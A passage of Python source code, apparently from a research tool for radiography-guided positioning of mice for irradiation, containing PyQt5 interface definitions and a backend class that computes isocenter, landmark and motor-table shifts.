self.menuBar.addAction(self.menuActions.menuAction())
self.menuBar.addAction(self.menuOptions.menuAction())
self.menuBar.addAction(self.menuUtils.menuAction())
self.retranslateUi(Mouse_Positioning_Interface)
self.Registration.setCurrentIndex(1)
QtCore.QMetaObject.connectSlotsByName(Mouse_Positioning_Interface)
def retranslateUi(self, Mouse_Positioning_Interface):
_translate = QtCore.QCoreApplication.translate
Mouse_Positioning_Interface.setWindowTitle(_translate("Mouse_Positioning_Interface", "Mouse Positioning Interface"))
self.groupBox.setTitle(_translate("Mouse_Positioning_Interface", "Log"))
self.GroupCoordinates.setTitle(_translate("Mouse_Positioning_Interface", "Workflow"))
self.SS_IC_Label.setText(_translate("Mouse_Positioning_Interface", "IsoCenter"))
self.SS_Plan_Box_2.setText(_translate("Mouse_Positioning_Interface", "Plan\n"
"Image"))
self.LabelCOM_4.setText(_translate("Mouse_Positioning_Interface", "Treatment\n"
"Image"))
self.LabelCOM_5.setText(_translate("Mouse_Positioning_Interface", "Registration\n"
"approved"))
self.LabelCOM_6.setText(_translate("Mouse_Positioning_Interface", "Motor stage\n"
"set"))
self.Button_create_report.setText(_translate("Mouse_Positioning_Interface", "Report"))
self.Group_IsoCenter.setTitle(_translate("Mouse_Positioning_Interface", "IsoCenter"))
self.label_5.setText(_translate("Mouse_Positioning_Interface", "x<sub>Iso</sub>="))
self.Button_Radiograph_toggleIso.setText(_translate("Mouse_Positioning_Interface", "Toggle"))
self.label_6.setText(_translate("Mouse_Positioning_Interface", "y<sub>Iso</sub>="))
self.Button_RG_defineIsoCenter.setText(_translate("Mouse_Positioning_Interface", "Define"))
self.groupBox_3.setTitle(_translate("Mouse_Positioning_Interface", "Landmarks"))
self.Button_RadiographyLM.setText(_translate("Mouse_Positioning_Interface", "Set Landmarks"))
self.Button_toggleLandmarksRG.setText(_translate("Mouse_Positioning_Interface", "Toggle Landmarks"))
self.label_24.setText(_translate("Mouse_Positioning_Interface", "x<sub>Pin</sub>="))
self.label_23.setText(_translate("Mouse_Positioning_Interface", "y<sub>Pin</sub>="))
self.Registration.setTabText(self.Registration.indexOf(self.TabRadiography), _translate("Mouse_Positioning_Interface", "Radiography"))
self.groupBox_20.setTitle(_translate("Mouse_Positioning_Interface", "Overlay"))
self.Button_RunReg.setText(_translate("Mouse_Positioning_Interface", "Run Registration"))
self.Button_AccReg.setText(_translate("Mouse_Positioning_Interface", "Accept Registration"))
self.groupBox_21.setTitle(_translate("Mouse_Positioning_Interface", "Default landmark positions"))
self.Button_default_moving.setText(_translate("Mouse_Positioning_Interface", "Set default positions (moving)"))
item = self.CoordsTable.verticalHeaderItem(0)
item.setText(_translate("Mouse_Positioning_Interface", "Marker 1"))
item = self.CoordsTable.verticalHeaderItem(1)
item.setText(_translate("Mouse_Positioning_Interface", "Marker 2"))
item = self.CoordsTable.verticalHeaderItem(2)
item.setText(_translate("Mouse_Positioning_Interface", "Marker 3"))
item = self.CoordsTable.verticalHeaderItem(3)
item.setText(_translate("Mouse_Positioning_Interface", "Marker 4"))
item = self.CoordsTable.verticalHeaderItem(4)
item.setText(_translate("Mouse_Positioning_Interface", "Marker 5"))
item = self.CoordsTable.horizontalHeaderItem(0)
item.setText(_translate("Mouse_Positioning_Interface", "Moving"))
item = self.CoordsTable.horizontalHeaderItem(1)
item.setText(_translate("Mouse_Positioning_Interface", "Fixed"))
__sortingEnabled = self.CoordsTable.isSortingEnabled()
self.CoordsTable.setSortingEnabled(False)
item = self.CoordsTable.item(0, 0)
item.setText(_translate("Mouse_Positioning_Interface", "655, 534"))
item = self.CoordsTable.item(0, 1)
item.setText(_translate("Mouse_Positioning_Interface", "655, 534"))
item = self.CoordsTable.item(1, 0)
item.setText(_translate("Mouse_Positioning_Interface", "592, 520"))
item = self.CoordsTable.item(1, 1)
item.setText(_translate("Mouse_Positioning_Interface", "592, 520"))
item = self.CoordsTable.item(2, 0)
item.setText(_translate("Mouse_Positioning_Interface", "494, 540"))
item = self.CoordsTable.item(2, 1)
item.setText(_translate("Mouse_Positioning_Interface", "494, 540"))
item = self.CoordsTable.item(3, 0)
item.setText(_translate("Mouse_Positioning_Interface", "602, 586"))
item = self.CoordsTable.item(3, 1)
item.setText(_translate("Mouse_Positioning_Interface", "602, 586"))
item = self.CoordsTable.item(4, 0)
item.setText(_translate("Mouse_Positioning_Interface", "703, 565"))
item = self.CoordsTable.item(4, 1)
item.setText(_translate("Mouse_Positioning_Interface", "703, 565"))
self.CoordsTable.setSortingEnabled(__sortingEnabled)
self.Button_default_fixed.setText(_translate("Mouse_Positioning_Interface", "Set default positions (fixed)"))
self.groupBox_2.setTitle(_translate("Mouse_Positioning_Interface", "Marker Control"))
self.label.setText(_translate("Mouse_Positioning_Interface", "Plan"))
self.label_3.setText(_translate("Mouse_Positioning_Interface", "Treatment"))
self.groupBox_10.setTitle(_translate("Mouse_Positioning_Interface", "Motor stage origin"))
self.label_13.setText(_translate("Mouse_Positioning_Interface", "x<sub>Table</sub>="))
self.label_57.setText(_translate("Mouse_Positioning_Interface", "mm"))
self.label_14.setText(_translate("Mouse_Positioning_Interface", "y<sub>Table</sub>="))
self.label_58.setText(_translate("Mouse_Positioning_Interface", "mm"))
self.Group_Result.setTitle(_translate("Mouse_Positioning_Interface", "Calculated table position:"))
self.label_9.setText(_translate("Mouse_Positioning_Interface", "x<sub>Table</sub>="))
self.label_59.setText(_translate("Mouse_Positioning_Interface", "mm"))
self.label_60.setText(_translate("Mouse_Positioning_Interface", "mm"))
self.label_10.setText(_translate("Mouse_Positioning_Interface", "y<sub>Table</sub>="))
self.groupBox_22.setTitle(_translate("Mouse_Positioning_Interface", "Transformation Parameters"))
self.Label_Trafo_Params.setText(_translate("Mouse_Positioning_Interface", "Parameters:"))
self.label_15.setText(_translate("Mouse_Positioning_Interface", "Transform: Similarity"))
self.groupBox_24.setTitle(_translate("Mouse_Positioning_Interface", "Motor Coordinates"))
self.label_19.setText(_translate("Mouse_Positioning_Interface", "hor"))
self.label_20.setText(_translate("Mouse_Positioning_Interface", "ver"))
self.Btn_setMotor_Origin.setText(_translate("Mouse_Positioning_Interface", "Set as Motor Origin"))
self.Btn_getCurrentMotor.setText(_translate("Mouse_Positioning_Interface", "Get current motor coordinates"))
self.Btn_Reg_calcTable.setText(_translate("Mouse_Positioning_Interface", "Calculate target table position"))
self.groupBox_23.setTitle(_translate("Mouse_Positioning_Interface", "Target Coordinates"))
item = self.table_TrgCoords.verticalHeaderItem(0)
item.setText(_translate("Mouse_Positioning_Interface", "Raw"))
item = self.table_TrgCoords.verticalHeaderItem(1)
item.setText(_translate("Mouse_Positioning_Interface", "Transformed"))
item = self.table_TrgCoords.horizontalHeaderItem(0)
item.setText(_translate("Mouse_Positioning_Interface", "x, y"))
item = self.table_TrgCoords.horizontalHeaderItem(1)
item.setText(_translate("Mouse_Positioning_Interface", "Get"))
__sortingEnabled = self.table_TrgCoords.isSortingEnabled()
self.table_TrgCoords.setSortingEnabled(False)
self.table_TrgCoords.setSortingEnabled(__sortingEnabled)
self.Button_flip_layers.setText(_translate("Mouse_Positioning_Interface", "Flip Image"))
self.Button_show_Atlas.setText(_translate("Mouse_Positioning_Interface", "Show Atlas"))
self.groupBox_18.setTitle(_translate("Mouse_Positioning_Interface", "Planning image"))
self.Button_load_moving.setText(_translate("Mouse_Positioning_Interface", "Load Image"))
self.groupBox_19.setTitle(_translate("Mouse_Positioning_Interface", "Treatment Image"))
self.Button_load_fixed.setText(_translate("Mouse_Positioning_Interface", "Load Image"))
self.Registration.setTabText(self.Registration.indexOf(self.tab), _translate("Mouse_Positioning_Interface", "Active Positioning"))
self.groupBox_6.setTitle(_translate("Mouse_Positioning_Interface", "Settings"))
self.LabelCOM.setText(_translate("Mouse_Positioning_Interface", "Disconnected"))
self.LabelREF.setText(_translate("Mouse_Positioning_Interface", "Not Calibrated"))
self.label_2.setText(_translate("Mouse_Positioning_Interface", "Mode"))
self.Label_COMPort.setText(_translate("Mouse_Positioning_Interface", "COM port"))
self.Button_MotorInit.setText(_translate("Mouse_Positioning_Interface", "Connect"))
self.Button_MotorDisconnect.setText(_translate("Mouse_Positioning_Interface", "Disconnect"))
self.LabelINIT.setText(_translate("Mouse_Positioning_Interface", "Not ready"))
self.groupBox_4.setTitle(_translate("Mouse_Positioning_Interface", "Current coordinates"))
self.label_4.setText(_translate("Mouse_Positioning_Interface", "x = "))
self.TablePosX.setText(_translate("Mouse_Positioning_Interface", "0"))
self.label_66.setText(_translate("Mouse_Positioning_Interface", "mm"))
self.label_64.setText(_translate("Mouse_Positioning_Interface", "y = "))
self.TablePosY.setText(_translate("Mouse_Positioning_Interface", "0"))
self.label_65.setText(_translate("Mouse_Positioning_Interface", "mm"))
self.groupBox_13.setTitle(_translate("Mouse_Positioning_Interface", "Table movement"))
self.Button_MoveTable.setText(_translate("Mouse_Positioning_Interface", "Move"))
self.Button_StopTable.setText(_translate("Mouse_Positioning_Interface", "Stop"))
self.label_69.setText(_translate("Mouse_Positioning_Interface", "y = "))
self.label_70.setText(_translate("Mouse_Positioning_Interface", "mm"))
self.label_67.setText(_translate("Mouse_Positioning_Interface", "x = "))
self.label_68.setText(_translate("Mouse_Positioning_Interface", "mm"))
self.ButtonCopyCoordinates.setText(_translate("Mouse_Positioning_Interface", "Copy Coordinates"))
self.Registration.setTabText(self.Registration.indexOf(self.TabMotor), _translate("Mouse_Positioning_Interface", "Motor Control"))
self.menuActions.setTitle(_translate("Mouse_Positioning_Interface", "File"))
self.menuOptions.setTitle(_translate("Mouse_Positioning_Interface", "Logging"))
self.menuLog_Level.setTitle(_translate("Mouse_Positioning_Interface", "Log Level"))
self.menuUtils.setTitle(_translate("Mouse_Positioning_Interface", "Utils"))
self.actionLoad_Radiography_scatter.setText(_translate("Mouse_Positioning_Interface", "Load Radiography (scatter)"))
self.action_SaveLogfile.setText(_translate("Mouse_Positioning_Interface", "Save Logfile"))
self.action_Exit.setText(_translate("Mouse_Positioning_Interface", "Exit"))
self.actionRestore_Old_Session.setText(_translate("Mouse_Positioning_Interface", "Load Logfile"))
self.action_LogLevel_Info.setText(_translate("Mouse_Positioning_Interface", "Info"))
self.action_LogLevel_Debug.setText(_translate("Mouse_Positioning_Interface", "Debug"))
self.action_Log_Serial_Com.setText(_translate("Mouse_Positioning_Interface", "Log Serial Com"))
self.actionSet_Logfile_Directory.setText(_translate("Mouse_Positioning_Interface", "Set Logfile Directory"))
self.action_scan_COM_ports.setText(_translate("Mouse_Positioning_Interface", "Rescan COM ports"))
self.actionN2V_for_RG.setText(_translate("Mouse_Positioning_Interface", "Noise2Void for Radiography"))
self.action_set_beam_diameter.setText(_translate("Mouse_Positioning_Interface", "Set Beam Diameter"))
from matplotlibwidgetFile import matplotlibWidget
import ressources_rc
``` |
{
"source": "jo-mueller/RadiAide",
"score": 2
} |
#### File: RadiAIDD/Backend/Radiography.py
```python
import logging
import numpy as np
from PyQt5.QtWidgets import QMessageBox as QMessage
from RadiAIDD.Backend.Containers import Crosshair
from RadiAIDD.Backend.Children import IsoCenter_Child as IsoCenter
# from Backend.Children import Landmark_Child as Landmark
class Radiography(object):
def __init__(self, GUI, Checklist):
self.GUI = GUI
self.Checklist = Checklist
try:
# Patient Positioning holds information about positioning
# of patient in CT
self.PatientPosition = []
# Crosshairs (two because two radiography images)
self.Crosshair_Landmark = [Crosshair(), Crosshair()]
self.Crosshair_Target = [Crosshair(), Crosshair()]
# Four isocenter crosshairs for active positioning (one per canvas)
self.Crosshair_IsoCenter = [Crosshair(), Crosshair(),
Crosshair(), Crosshair()]
# Visibility flags for crosshair, landmark and target
self.crosshair = False
self.landmark = False
self.target = False
self.pixelsizeXR = None
self.pixelsizeRG = None
# Image data/Target coordinate containers
# self.Radiography_scatter = Lynx()
# RADIOGRAPHY RELATED Buttons
self.GUI.Button_RG_defineIsoCenter.clicked.connect(self.define_isocenter)
# self.GUI.Button_RadiographyLM.clicked.connect(self.define_landmarks)
# toggle visibility of isocenter crosshair in Radiography
self.GUI.Button_Radiograph_toggleIso.clicked.connect(self.toggleIso)
# toggle visibility of landmark lines in Radiography
self.GUI.Button_toggleLandmarksRG.clicked.connect(self.toggleLM)
logging.info('Radiography class successfully initialized')
except Exception:
# logging.exception also records the traceback, unlike logging.error
logging.exception('Radiography class could not be initialized')
def define_isocenter(self):
"start pipeline in open child window within which isocenter is defined"
if self.Checklist.IsoCenter:
# If Landmarks were determined previously:
Hint = QMessage()
Hint.setIcon(QMessage.Information)
Hint.setStandardButtons(QMessage.Ok | QMessage.Cancel)
Hint.setText("Loading new Radiography will remove Isocenter "
"Definition. \n Proceed?")
proceed = Hint.exec_()
if proceed == QMessage.Ok:
[crosshair.wipe() for crosshair in self.Crosshair_IsoCenter]
self.GUI.Text_RG_Filename_IsoCenter.setText('')
self.GUI.SpotTxt_x.setText('')
self.GUI.SpotTxt_y.setText('')
self.GUI.Display_Isocenter.canvas.axes.imshow([[0], [0]])
self.GUI.Display_Isocenter.canvas.draw()
self.Checklist.IsoCenter = False
else:
return 0
# set state down just to be sure here
self.GUI.IsoCenterState.flag_down()
self.isocenter_window = IsoCenter(self.GUI, self)
self.isocenter_window.show()
# def define_landmarks(self):
# "start pipeline in open child window within which isocenter is defined"
# if self.Checklist.LandmarkRG:
# # If Landmarks were determined previously:
# Hint = QMessage()
# Hint.setIcon(QMessage.Information)
# Hint.setStandardButtons(QMessage.Ok | QMessage.Cancel)
# Hint.setText("Loading new Radiography will remove "
# "Landmark Definition. \n Proceed?")
# proceed = Hint.exec_()
# if proceed == QMessage.Ok:
# # Remove all Landmark-related values/flags
# [crosshair.wipe for crosshair in self.Crosshair_Landmark]
# self.GUI.Text_RG_Filename_Landmark.setText('')
# self.GUI.TxtRGPinX.setText('')
# self.GUI.TxtRGPinY.setText('')
# self.GUI.TxtRGShiftX.setText('')
# self.GUI.TxtRGShiftY.setText('')
# self.GUI.TxtRG_pxcalc.setText('Pixel Spacing:')
# self.GUI.Display_Radiography.canvas.axes.imshow([[0], [0]])
# self.GUI.Display_Radiography.canvas.draw()
# self.Checklist.LandmarkRG = False
# else:
# return 0
# "start pipeline in child window within which landmarks are defined"
# self.landmark_window = Landmark(self.GUI, self)
# self.landmark_window.show()
def CalcDist(self):
# DEPRECATED?
" Calculate actual shift between target and isocenter"
# if not all values are set: do nothing
if not self.Checklist.ready():
return 0
# TxtRGShiftX
# Get current coordinates of moving tables
x_table = float(self.GUI.TableTxt_x.text())
y_table = float(self.GUI.TableTxt_y.text())
# Get coordinates from repositioning
x_repo = float(self.GUI.LCD_shift_x.value())
y_repo = float(self.GUI.LCD_shift_y.value())
# get coordinates of isocenter (relative to earpin)
x_iso = float(self.GUI.TxtRGShiftX.text())
y_iso = float(self.GUI.TxtRGShiftY.text())
# get coordinates of target (relative to earpin)
x_target = float(self.GUI.TxtXRShiftX.text())
y_target = float(self.GUI.TxtXRShiftY.text())
# Caution: Head first supine and feet first prone positions have
# inverted dorsal-ventral and inferior-superior axes!!!
if self.PatientPosition == 'HFS':
# (-1) because x/y-coordinates are inverse in table/CT coordinates
target2iso_x = (-1.0)*(x_iso - x_target) + x_table + x_repo
target2iso_y = (-1.0)*(y_iso - y_target) + y_table + y_repo
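# Illustrative sanity check with assumed numbers (not from a real
# session): for x_iso=2.0, x_target=1.0, x_table=10.0, x_repo=0.5 the
# HFS branch gives (-1)*(2.0 - 1.0) + 10.0 + 0.5 = 9.5, i.e. the
# iso-to-target offset is applied against the image axis because HFS
# inverts it relative to the table coordinates.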
# Write to text field
self.GUI.TableTxt_xCorr.setText('{:4.2f}'.format(target2iso_x))
self.GUI.TableTxt_yCorr.setText('{:4.2f}'.format(target2iso_y))
elif self.PatientPosition == 'FFP':
target2iso_x = x_table + (x_iso - x_target) + x_repo
target2iso_y = y_table + (y_iso - y_target) + y_repo
# Write to text field
self.GUI.TableTxt_xCorr.setText('{:4.2f}'.format(target2iso_x))
self.GUI.TableTxt_yCorr.setText('{:4.2f}'.format(target2iso_y))
else: # if other positionings were used:
self.GUI.TableTxt_xCorr.setText('Unknown Pat. Positioning')
self.GUI.TableTxt_yCorr.setText('Unknown Pat. Positioning')
return 0
# Highlight result
self.GUI.Group_Result.setStyleSheet(".QGroupBox { border: 2px solid "
"rgb(0,0,255);}")
self.GUI.TableTxt_xCorr.setStyleSheet("color: #b1b1b1; font-weight: bold;")
self.GUI.TableTxt_yCorr.setStyleSheet("color: #b1b1b1; font-weight: bold;")
def return_spacing(self, Spacing):
" Function to be invoked from landmark child to pass spacing values"
# Calculate RG pixel spacing from bed top/bottom coordinates
self.pixelsizeRG = Spacing
# print to field and pass result to Radiography instance
self.GUI.TxtRG_pxcalc.setText('Pixel Spacing: {:4.2f} mm'.format(
self.pixelsizeRG))
self.GUI.TxtRG_pxcalc.setStyleSheet("color: #b1b1b1;")
def return_landmarks(self, Image, xy):
"""Function to be invoked from child
window that serves Landmark definition by earpin"""
# catch returned Image data
self.LandmarkRG = Image
x_lm = xy[0]
y_lm = xy[1]
# Set GUI fields
self.GUI.TxtRGPinX.setText(str(x_lm))
self.GUI.TxtRGPinY.setText(str(y_lm))
self.GUI.TxtRGPinX.setStyleSheet("color: #b1b1b1;")
self.GUI.TxtRGPinY.setStyleSheet("color: #b1b1b1;")
self.GUI.Text_RG_Filename_Landmark.setText(self.LandmarkRG.filename)
# Raise Flag in Checklist
self.Checklist.LandmarkRG = True
# Make image
self.GUI.Display_Radiography.canvas.axes.imshow(self.LandmarkRG.array,
cmap='gray', zorder=1,
origin='lower')
self.GUI.Display_Radiography.canvas.draw()
canvases = [self.GUI.Display_Radiography.canvas,
self.GUI.Display_Isocenter.canvas]
# Prepare crosshairs
for crosshair in tuple(zip(self.Crosshair_Landmark, canvases)):
crosshair[0].setup(crosshair[1], size=5, x=x_lm, y=y_lm,
text='Earpin', zorder=3,
color='red', circle=False)
# If landmark and isocenter are provided,
# calculate spatial shift in RG image
if self.Checklist.IsoCenter and self.Checklist.LandmarkRG:
pixperdistRG = self.pixelsizeRG
# Get local representatives of necessary variables
x_Iso = float(self.GUI.SpotTxt_x.text())
y_Iso = float(self.GUI.SpotTxt_y.text())
x_Pin = float(self.GUI.TxtRGPinX.text())
y_Pin = float(self.GUI.TxtRGPinY.text())
# Calculate shift
dx = pixperdistRG*(x_Iso - x_Pin)
dy = pixperdistRG*(y_Iso - y_Pin)
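# dx/dy convert the pixel offset between isocenter and earpin into mm
# via the radiography pixel spacing; e.g. (assumed values) a 10 px
# offset at 0.1 mm/px gives dx = 1.0 mm, which is exactly the 1 mm
# tolerance checked below.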
self.GUI.TxtRGShiftX.setText('{:4.2f}'.format(dx))
self.GUI.TxtRGShiftY.setText('{:4.2f}'.format(dy))
if np.sqrt(dx**2 + dy**2) < 1.0:
self.GUI.TxtRGShiftX.setStyleSheet("color: rgb(0, 255, 0);")
self.GUI.TxtRGShiftY.setStyleSheet("color: rgb(0, 255, 0);")
else:
self.GUI.TxtRGShiftX.setStyleSheet("color: rgb(255, 0, 0);")
self.GUI.TxtRGShiftY.setStyleSheet("color: rgb(255, 0, 0);")
self.CalcDist()
def return_isocenter(self, RadiographyImg, xy):
"""Function to be invoked from child window that passes IsoCenter
coordinates to main window"""
self.IsoCenterImg = RadiographyImg
x_iso = xy[0]
y_iso = xy[1]
self.GUI.SpotTxt_x.setText('{:.3f}'.format(x_iso))
self.GUI.SpotTxt_y.setText('{:.3f}'.format(y_iso))
self.GUI.SpotTxt_x.setStyleSheet("color: #b1b1b1;")
self.GUI.SpotTxt_y.setStyleSheet("color: #b1b1b1;")
# Set checklist entry for IsoCenter True and try calculation
self.Checklist.IsoCenter = True
if self.Checklist.ready():
self.CalcDist()
# Display isocenter image, filename and enable crosshair on this image
self.GUI.Display_Isocenter.canvas.axes.imshow(self.IsoCenterImg.array,
cmap='gray',
zorder=1, origin='lower')
self.GUI.Display_Isocenter.canvas.draw()
self.GUI.Text_RG_Filename_IsoCenter.setText(self.IsoCenterImg.filename)
canvases = [self.GUI.Display_Radiography.canvas,
self.GUI.Display_Isocenter.canvas,
self.GUI.Display_Fixed.canvas,
self.GUI.Display_Fusion.canvas]
# Prepare crosshairs
for crosshair in tuple(zip(self.Crosshair_IsoCenter, canvases)):
crosshair[0].setup(crosshair[1], size=5, x=x_iso, y=y_iso,
text='IsoCenter', zorder=3,
color='blue', circle=True)
# Write this to statesign
self.GUI.IsoCenterState.toggle()
def toggleLM(self):
for crosshair in self.Crosshair_Landmark:
crosshair.toggle()
def toggleIso(self):
for crosshair in self.Crosshair_IsoCenter:
crosshair.toggle()
```
#### File: RadiAIDD/Backend/Target5.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Target(object):
def setupUi(self, Target):
Target.setObjectName("Target")
Target.resize(691, 517)
self.centralwidget = QtWidgets.QWidget(Target)
self.centralwidget.setObjectName("centralwidget")
self.groupBox = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox.setGeometry(QtCore.QRect(10, 10, 661, 461))
self.groupBox.setObjectName("groupBox")
self.Display_XRay = matplotlibWidget(self.groupBox)
self.Display_XRay.setGeometry(QtCore.QRect(100, 50, 400, 400))
self.Display_XRay.setObjectName("Display_XRay")
self.Button_Done = QtWidgets.QPushButton(self.groupBox)
self.Button_Done.setGeometry(QtCore.QRect(540, 400, 111, 31))
self.Button_Done.setObjectName("Button_Done")
self.groupBox_2 = QtWidgets.QGroupBox(self.groupBox)
self.groupBox_2.setGeometry(QtCore.QRect(10, 20, 81, 411))
self.groupBox_2.setObjectName("groupBox_2")
self.splitter = QtWidgets.QSplitter(self.groupBox_2)
self.splitter.setGeometry(QtCore.QRect(20, 20, 40, 371))
self.splitter.setOrientation(QtCore.Qt.Vertical)
self.splitter.setObjectName("splitter")
self.layoutWidget = QtWidgets.QWidget(self.splitter)
self.layoutWidget.setObjectName("layoutWidget")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.layoutWidget)
self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.GreyValue_center = QtWidgets.QSlider(self.layoutWidget)
self.GreyValue_center.setOrientation(QtCore.Qt.Vertical)
self.GreyValue_center.setObjectName("GreyValue_center")
self.horizontalLayout_2.addWidget(self.GreyValue_center)
self.GreyValue_range = QtWidgets.QSlider(self.layoutWidget)
self.GreyValue_range.setOrientation(QtCore.Qt.Vertical)
self.GreyValue_range.setObjectName("GreyValue_range")
self.horizontalLayout_2.addWidget(self.GreyValue_range)
self.layoutWidget_2 = QtWidgets.QWidget(self.splitter)
self.layoutWidget_2.setObjectName("layoutWidget_2")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.layoutWidget_2)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.Label_Scrollbar_center = QtWidgets.QLabel(self.layoutWidget_2)
self.Label_Scrollbar_center.setAutoFillBackground(True)
self.Label_Scrollbar_center.setObjectName("Label_Scrollbar_center")
self.horizontalLayout.addWidget(self.Label_Scrollbar_center)
self.Label_Scrollbar_range = QtWidgets.QLabel(self.layoutWidget_2)
self.Label_Scrollbar_range.setObjectName("Label_Scrollbar_range")
self.horizontalLayout.addWidget(self.Label_Scrollbar_range)
self.Button_setTarget = QtWidgets.QPushButton(self.groupBox)
self.Button_setTarget.setGeometry(QtCore.QRect(540, 30, 111, 31))
self.Button_setTarget.setObjectName("Button_setTarget")
self.Slider_TargetX = QtWidgets.QSlider(self.groupBox)
self.Slider_TargetX.setGeometry(QtCore.QRect(100, 20, 401, 19))
self.Slider_TargetX.setOrientation(QtCore.Qt.Horizontal)
self.Slider_TargetX.setObjectName("Slider_TargetX")
self.Slider_TargetY = QtWidgets.QSlider(self.groupBox)
self.Slider_TargetY.setGeometry(QtCore.QRect(510, 50, 19, 391))
self.Slider_TargetY.setOrientation(QtCore.Qt.Vertical)
self.Slider_TargetY.setInvertedAppearance(True)
self.Slider_TargetY.setObjectName("Slider_TargetY")
self.Button_lockTarget = QtWidgets.QPushButton(self.groupBox)
self.Button_lockTarget.setGeometry(QtCore.QRect(540, 130, 111, 31))
self.Button_lockTarget.setObjectName("Button_lockTarget")
self.widget = QtWidgets.QWidget(self.groupBox)
self.widget.setGeometry(QtCore.QRect(542, 72, 111, 48))
self.widget.setObjectName("widget")
self.gridLayout = QtWidgets.QGridLayout(self.widget)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
self.label_5 = QtWidgets.QLabel(self.widget)
self.label_5.setObjectName("label_5")
self.gridLayout.addWidget(self.label_5, 0, 0, 1, 1)
self.TxtTrgtX = QtWidgets.QLineEdit(self.widget)
self.TxtTrgtX.setObjectName("TxtTrgtX")
self.gridLayout.addWidget(self.TxtTrgtX, 0, 1, 1, 1)
self.label_6 = QtWidgets.QLabel(self.widget)
self.label_6.setObjectName("label_6")
self.gridLayout.addWidget(self.label_6, 1, 0, 1, 1)
self.TxtTrgtY = QtWidgets.QLineEdit(self.widget)
self.TxtTrgtY.setObjectName("TxtTrgtY")
self.gridLayout.addWidget(self.TxtTrgtY, 1, 1, 1, 1)
Target.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(Target)
self.menubar.setGeometry(QtCore.QRect(0, 0, 691, 21))
self.menubar.setObjectName("menubar")
Target.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(Target)
self.statusbar.setObjectName("statusbar")
Target.setStatusBar(self.statusbar)
self.retranslateUi(Target)
QtCore.QMetaObject.connectSlotsByName(Target)
def retranslateUi(self, Target):
_translate = QtCore.QCoreApplication.translate
Target.setWindowTitle(_translate("Target", "TargetDefinition"))
self.groupBox.setTitle(_translate("Target", "Target"))
self.Button_Done.setText(_translate("Target", "Done"))
self.groupBox_2.setTitle(_translate("Target", "Gray Window"))
self.Label_Scrollbar_center.setText(_translate("Target", "0"))
self.Label_Scrollbar_range.setText(_translate("Target", "0"))
self.Button_setTarget.setText(_translate("Target", "Set Target"))
self.Button_lockTarget.setText(_translate("Target", "Lock"))
self.label_5.setText(_translate("Target", "x="))
self.label_6.setText(_translate("Target", "y="))
from matplotlibwidgetFile import matplotlibWidget
```
#### File: Backend/UI/Landmark5.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Landmark(object):
def setupUi(self, Landmark):
Landmark.setObjectName("Landmark")
Landmark.resize(787, 539)
self.centralwidget = QtWidgets.QWidget(Landmark)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout_2 = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout_2.setObjectName("gridLayout_2")
self.Display_Landmarks = matplotlibWidget(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Display_Landmarks.sizePolicy().hasHeightForWidth())
self.Display_Landmarks.setSizePolicy(sizePolicy)
self.Display_Landmarks.setObjectName("Display_Landmarks")
self.gridLayout_2.addWidget(self.Display_Landmarks, 0, 0, 2, 1)
self.groupBox_2 = QtWidgets.QGroupBox(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_2.sizePolicy().hasHeightForWidth())
self.groupBox_2.setSizePolicy(sizePolicy)
self.groupBox_2.setObjectName("groupBox_2")
self.gridLayout = QtWidgets.QGridLayout(self.groupBox_2)
self.gridLayout.setObjectName("gridLayout")
self.Button_LoadLandmark = QtWidgets.QPushButton(self.groupBox_2)
self.Button_LoadLandmark.setObjectName("Button_LoadLandmark")
self.gridLayout.addWidget(self.Button_LoadLandmark, 0, 0, 1, 1)
self.Text_Filename = QtWidgets.QTextBrowser(self.groupBox_2)
self.Text_Filename.setObjectName("Text_Filename")
self.gridLayout.addWidget(self.Text_Filename, 1, 0, 1, 1)
self.gridLayout_2.addWidget(self.groupBox_2, 0, 1, 1, 1)
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.groupBox_autodetect = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_autodetect.setMinimumSize(QtCore.QSize(215, 0))
self.groupBox_autodetect.setObjectName("groupBox_autodetect")
self.gridLayout_4 = QtWidgets.QGridLayout(self.groupBox_autodetect)
self.gridLayout_4.setObjectName("gridLayout_4")
self.label_4 = QtWidgets.QLabel(self.groupBox_autodetect)
self.label_4.setObjectName("label_4")
self.gridLayout_4.addWidget(self.label_4, 0, 0, 1, 1)
self.d_SourceDetector = QtWidgets.QDoubleSpinBox(self.groupBox_autodetect)
self.d_SourceDetector.setDecimals(1)
self.d_SourceDetector.setMaximum(400.0)
self.d_SourceDetector.setObjectName("d_SourceDetector")
self.gridLayout_4.addWidget(self.d_SourceDetector, 0, 1, 1, 1)
self.label_6 = QtWidgets.QLabel(self.groupBox_autodetect)
self.label_6.setObjectName("label_6")
self.gridLayout_4.addWidget(self.label_6, 0, 2, 1, 1)
self.label_5 = QtWidgets.QLabel(self.groupBox_autodetect)
self.label_5.setObjectName("label_5")
self.gridLayout_4.addWidget(self.label_5, 1, 0, 1, 1)
self.d_ObjectDetector = QtWidgets.QDoubleSpinBox(self.groupBox_autodetect)
self.d_ObjectDetector.setDecimals(1)
self.d_ObjectDetector.setMaximum(400.0)
self.d_ObjectDetector.setObjectName("d_ObjectDetector")
self.gridLayout_4.addWidget(self.d_ObjectDetector, 1, 1, 1, 1)
